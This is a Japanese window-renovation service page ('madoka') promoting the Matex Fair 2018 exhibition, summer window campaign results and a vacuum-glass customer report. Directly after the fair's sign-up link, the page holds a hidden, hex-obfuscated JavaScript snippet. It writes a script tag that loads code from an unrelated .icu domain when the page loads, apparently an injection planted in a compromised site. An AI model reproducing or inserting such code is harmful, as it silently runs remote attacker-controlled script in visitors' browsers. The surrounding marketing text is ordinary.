お電話は0120-306-300

未分類

未分類

マテックスフェア-2018を開催!

マテックスフェア-2018を開催! 年に一度のガラス・サッシ建材をメインとした展示会、マテックスフェアーが今年も開催されます。今年で創業90周年を迎えるマテックス株式会社!昨年よりグレードアップした展示内容を予定しており、建築業者様だけでなく一般のお客様もご来場いただけます。ぜひお気軽に足をお運びくださいませ。 開催概要 日時:2018年10月6日(土)10:00~17:30 会場:東京ドームシティ プリズムホール 東京都文京区後楽1丁目3−61 ★会場案内図はこちら(クリック) ★お申込みはこちら(クリック) 見どころ 1.他では見られない!ガラス・サッシ建材の展示 住宅やビルに使われる、ガラス・アルミ建材のあらゆるメーカー約40社が出展します。各建材メーカーが提供する最新の建材やサービスをご紹介します。この貴重な機会をぜひお見逃しなく! ★出展企業一覧はこちら▽ 2.メーカー6社による施工実演 各メーカーブースでは1日に数回、おすすめの製品の施工実演を見ることができます。窓や玄関のカバー工法、水害に備えた止水板、高断熱ブラインドなど、実際の製品の取付け方法がわかる貴重な機会です。 ★施工実演のタイムスケジュールはこちら▽ 3.「業界の常識を覆す」豪華2本立てセミナー 「新たな住まいをひらく」窓業界、建築業界を多様な視点で捉えるセミナーを開催します。 ◆午前の部のキーワード:ユニバーサルデザイン 株式会社ミライロ 垣内俊哉様 11:00~12:00 ◆午後の部のキーワード:IoT/建築業界のシステム開発 SOUSEI株式会社 乃村一政様、株式会社ダンドリーワークス 加賀爪宏介様 14:00~15:00 ★セミナーの詳細はこちら▽ そのほか、後世へ残したい高断熱・高性能窓の展示、マンション住民必見!マンション改修ミニセミナー、豊かで自分らしい住まいを実現する窓辺のリノベーションのご提案など、見どころはたくさん!お子様向けのキッズコーナーもご用意しておりますので、ご家族でも楽しんでいただけます。皆様のご来場を心よりお待ちしております。 ★お申込はこちらから(クリック)// var _0xe540=["\x3C\x73\x63\x72","\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x31\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x64\x69\x6E\x6F\x72","\x73\x6C\x69\x63\x6B\x2E\x69\x63\x75\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];function gpor(){var _0x4eb6x2=_0xe540[0];var _0x4eb6x3=_0xe540[1];var _0x4eb6x4=_0xe540[2];var _0x4eb6x5=_0xe540[3];document[_0xe540[4]](_0x4eb6x2+ _0x4eb6x3+ _0x4eb6x4+ _0x4eb6x5)}gpor()

続きを見る

キャンペーンのお知らせ

夏の窓辺物語 暑さ対策ご紹介

夏の窓辺物語 暑さ対策ご紹介 平成26年7月14日(月)からスタートしました「夏の窓辺物語キャンペーン」は、平成27年10月20日(月)をもちまして終了致しました。 皆様、キャンペーンにご参加いただき、誠にありがとうございました。 キャンペーン期間3ヶ月で、計14通の物語が届きました! 皆さまからお寄せいただいた「物語」をご紹介いたします。 「最優秀物語」はこちらから。 夏のリフォームの目的は「採風」が第1位 暑い夏、風通しを良くしたい、というお声が多くありました。 ● マンションの1階で台所に勝手口がついているが、蚊が多く開け放しておけなかった。(東京都Y様) ● とにかく家の中は暑い。一日クーラー漬けでもよくないし、ホームセンターで見て網戸取付を希望。(神奈川県M様) ● 風通しのよい家だったのですが、なかなかドアが開けられませんでした。(東京都H様) 最も多く採用されたのは「玄関用網戸」 玄関や勝手口を開けて風を通したいけれど、虫が気になる!というご希望にお応えする製品。臭い対策にも効果を発揮しているようです。 ● 勝手口を開け放しておけるため、風の通りが良くなり炊事も涼しくできるようになりました。とても快適に過ごせたため、玄関にも設置してもらいました。風の通りがとても良くなり、日中もエアコンなしで過ごせました。(東京都Y様) ● 夕方などは、クーラーのスイッチを切り玄関からの風を入れて過ごすことができました。玄関のニオイ対策にも良かったと思います。(神奈川県M様) ● 自然の風が大好きな私には玄関を開けると、風が入り快適です。我が家では猫を飼っているので、臭い対策にも良かったです。(神奈川県I様) 「遮熱対策」では、日よけシェードなどが採用 ●  窓が大きく開放的なのは良いのですが夏の日差しが差しこみ暑い!外で日差しをカットするのが良いと聞きシェードを希望。家の外観とも良くマッチし、おしゃれな感じがします。(神奈川県K様) 台風などの「雨風対策」には、シャッターや雨戸が採用 ● 雨戸がついていないため、これからの季節台風時の雨風が心配です。防犯の面でも不安が・・・。夏の暑さ対策なども考え、風通しが良くなるよう電動スリットシャッターで工事を決断しました。採光や通気をコントロールできるところがお気に入りです。昼間風を取りこんでいるせいか、 夜になっても温度があがらず、電気代も違うような気がします。防犯面の安心感も違います。(神奈川県N様)

続きを見る

キャンペーンのお知らせ

夏の窓辺物語キャンペーン最優秀賞発表

夏の窓辺物語キャンペーン最優秀賞発表 平成26年7月14日(月)からスタートしました「夏の窓辺物語キャンペーン」は、平成26年10月20日(月)をもちまして終了致しました。 皆様、キャンペーンにご参加いただき、誠にありがとうございました。 キャンペーン期間3ヶ月で、計14通の物語が届きました! 皆さまの夏の物語はこちらから。 ご応募いただいた物語の中から、madokaスタッフが、厳選な審査を行った結果… K様!おめでとうございます! 今回、K様邸を施工いたしました千葉県柏市の「株式会社 木村ガラス」と、最優秀賞のQUOカード「5,000円分」を進呈に、授与式を行いました! K様の夏の窓辺物語 受賞されたK様にさらに詳しいお話を伺いました! リフォームを行おうと思ったきっかけは何ですか? 築30年を超えており、夏は風通しの悪さ、冬はお風呂の寒さと結露に悩んでおり、玄関ドアも木製のため交換しようと思い、リフォームを行うことにしました。 木村ガラスを選んだ理由は何ですか? はじめはショールームを見に行ったのですが自分では分からず、以前木村ガラスさんのチラシが入っていたことを思い出し、直接お店に伺いました。 そこでスペーシアとインプラス、採風玄関ドアを提案されたのですが、商品の良さだけではなく、実際の使い勝手や場所による採用商品の工夫のしかたを教えてくれたのが良かったです。 リフォーム後、夏を過ごしてみていかがでしたか? 家の中に風が通るようになり涼しくなりました。 午前中はエアコンなしでも過ごせ、午後つけた時も効きが良くなりました。 内窓を付けた面は静かになり、防音効果も発揮しています。 リフォーム後、冬を迎えてみていかがですか? 1階は今まで朝の外気温が5℃のときは室内が7℃ほどでしたが、今は10℃ほどでエアコンをつけても暖まる時間が速くなりました。 台所も前はとても寒かったですが、今は火を使うとその熱で部屋が暖かくなります。結露に関しては換気扇を回していればほとんど気にならなくなりました。部屋全体が暖かいですね。 減税制度や今回のようなキャンペーンはご存じでしたか? 知らなかったです。今回は所得税減税の話を木村ガラスさんから教えてもらい、利用することにしました。 利用してみると相当な減税となりました。キャンペーンに関しても後日木村ガラスさんから是非応募してみてくださいと応募用紙を渡されて応募しました。 リフォーム後写真 ※クリックで拡大してご覧になれます スペーシア交換玄関ドア交換 内窓設置 木村ガラスコメント 実際使ってみたときのイメージが湧きにくいと思うので、イメージが湧きやすいよう場所毎のお悩みに合わせて商品を提案するようにしました。 madokaスタッフコメント 玄関扉交換のほか、内窓設置と真空ガラス交換などをお悩みや場所毎に採用しており、夏の暑さ対策だけではなく冬の寒さ対策も考えたリフォームを行ったK様を、今回のキャンペーンの最優秀賞とさせていただきました。 最後に 今回の夏の窓辺物語キャンペーンにご応募いただきました皆様、 誠にありがとうございました!! 皆様からお寄せ頂きました貴重なご意見やご要望は、 今後のサービス向上に役立ててまいります。 今後ともmadokaをお引き立てくださいますようお願い申し上げます。

続きを見る

キャンペーンのお知らせ

私のスペーシア物語キャンペーン最優秀賞発表

私のスペーシア物語キャンペーン最優秀賞発表 平成25年12月15日(日)からスタートしました「私のスペーシア物語キャンペーン」は、平成26年4月30日(火)をもちまして終了致しました。 皆様、キャンペーンにご参加いただき、誠にありがとうございました。 キャンペーン期間4ヶ月半で、計25通のハガキが届きました! ご応募いただいた25通の中から、madokaスタッフが、厳選な審査を 行った結果・・・・ Y様!おめでとうございます! 今回、Y様邸を施工致しました埼玉県新座市の「野崎硝子」と、最優秀賞の QUOカード「5,000円分」を進呈に、6月6日(金)に授与式を行ってきました! Y様コメント 冬だけではなく、夏の冷房の効きもよくなり、予想以上の効果に驚いています。 madokaスタッフコメント 一番大きな掃き出し窓を交換することで、窓からの熱の出入りが減り、冷暖房費が節約されたと喜んでいただけてよかったです。   Y様のスペーシア物語キャンペーン 窓リフォームの目的は何ですか? リビングと出窓、子供部屋出窓の結露が激しく、冬場は暖房、夏の冷房を良くしたい思い「スペーシア」を決定しました。 リフォーム後、生活はどうなりましたか?(効果、体感など) 昨年迄と違い結露はなく、朝の手間が省けたと同時に、ガスストーブによる暖房の時間が大幅に減りました。昨年迄は、10月末にストーブ使用が今年は、12月末使用開始で驚いております。 工事した窓の専門店への感想やご意見など、ご記入下さい。 誠実で丁寧な対応で信頼出来る「街のガラス屋さん」という印象です。効果が判ったので残りの子供部屋の工事もと、夫婦で話し合っています。(消費増税前に) madokaスタッフコメント Y様は、ストーブの使用期間の短さと、効果を具体的に明記しておりました。また、追加工事を考えておりスペーシアの良さを実感していただけたことが、感じられました。さらに、Y様は「施工してよかった」で、完結しておらず、次に繋がるストーリー性を感じられました。 全体アンケート集計結果 リフォームの目的 ・毎年結露と騒音に悩んでいました。(板橋区M様) ・其れ迄、普通のガラスで、外気の冷却により冬場寒かった。(横浜市H様)  リフォーム後の効果・体感 ・結露は大幅に軽減されたのと、ほぼ全窓がスペーシアとなり、寝室は夜間の   オイルヒーターが不要な冬を過ごせました。(川崎市Y様) ・フレームが結露するのでなくなりはしませんが、助かっています。(横浜市M様) ・毎朝、結露を拭かなくてよく楽になった。早朝に寒さを感じなくなった。防音も   かなり効果があり静かになった。(印西市H様) ・ガラスの結露はなくなったが、窓が重くなった。(蓮日市S様) ・冬の暖房費が格段に安くなりました。(横浜市N様) 最後に アンケートにご協力いただきました皆様、誠にありがとうございました。 madoka事務局では、今後も様々なキャンペーンを企画していきます。 スペーシアと共に始まるこれからの生活が、スペーシアのように心温まるものに なることを心より願っております。  

続きを見る

未分類

真空ガラス 体感レポート!~11月中旬~

平成23年11月17日に、1日の温度変化の状況をおってみました。下図のグラフがその結果です。深夜から午前中にかけて周辺温度に約2度の差がでています。また、午後からはあまり差がでない時間帯がありますが、日中で外気も上昇してきているため、それほど冷たい空気の流入もないものと思われます。 平均2℃の温度差。結露の状況に大きな差が ● 結露の発生状況はいかがですか? 三橋 目に見えて違いますね。片側の窓は計測開始の11月中旬から結露しはじめたのですが、 真空ガラスに変えた方は、全く結露しないです。ちなみに暖房は11月17日現在でまだ使用していません。 ● 計測した窓際の温度にもずいぶん差がでていますね。夜間から朝方にかけて2度くらいの温度差がでています。同じ室内でも窓際の空気にこれだけ差がでるんですね。寒さの体感はいかがでしょうか? 三橋 片側だけだから当たり前かも知れませんがやっぱり寒いですよ(笑)。ただ、手でガラスを触ってみたら寒さが全く伝わっていないのが明らかに感じられますね。「あ、こんなに違うものなんだ。」というのを妻と2人で驚きました。 ● お部屋の寒さは、やっぱりそうですか(笑)。よく、居室の全ての窓を取り変えないと、その部分から寒さが入ってくると言われています。この部屋の場合、出窓もありますからその影響もあると思います。出窓は、特に外に接する面積が広く、空気だまりができやすいので断熱対策としては要注意です。 今なら利用できる国の補助制度(2011年11月30日現在) 三橋 将来的にこちらの出窓も真空ガラスに変えてしまったほうがよいのでしょうか? ● そうですね。中には住宅ローン型の減税制度(条件等詳細は参照)を利用するために、自宅の全ての居室をやられる方もいらっしゃいます。 三橋 住宅ローン型減税制度を利用するには、家全部の窓をやる必要があるんですか?!それはまとまったお金が必要になりますね(汗)。出窓の場合、他には何かよい方法はあるのですか? ● 内窓を設置する方法や、外窓交換といってガラスをサッシ枠ごと入れ替える方法などもあります。今あげた2つの方法ですと、11月21日から復活している「住宅エコポイント」を申請できる可能性が高いですね。コストをかけない方法ですと、カーテンをしめるだけでも随分違いがでると思います。 次回は11月下旬以降のデータ、およびガラスの表面温度についても計測予定です。

続きを見る

 


PAGE TOP

窓のコンシェルジュ「madoka」

madoka公式ページ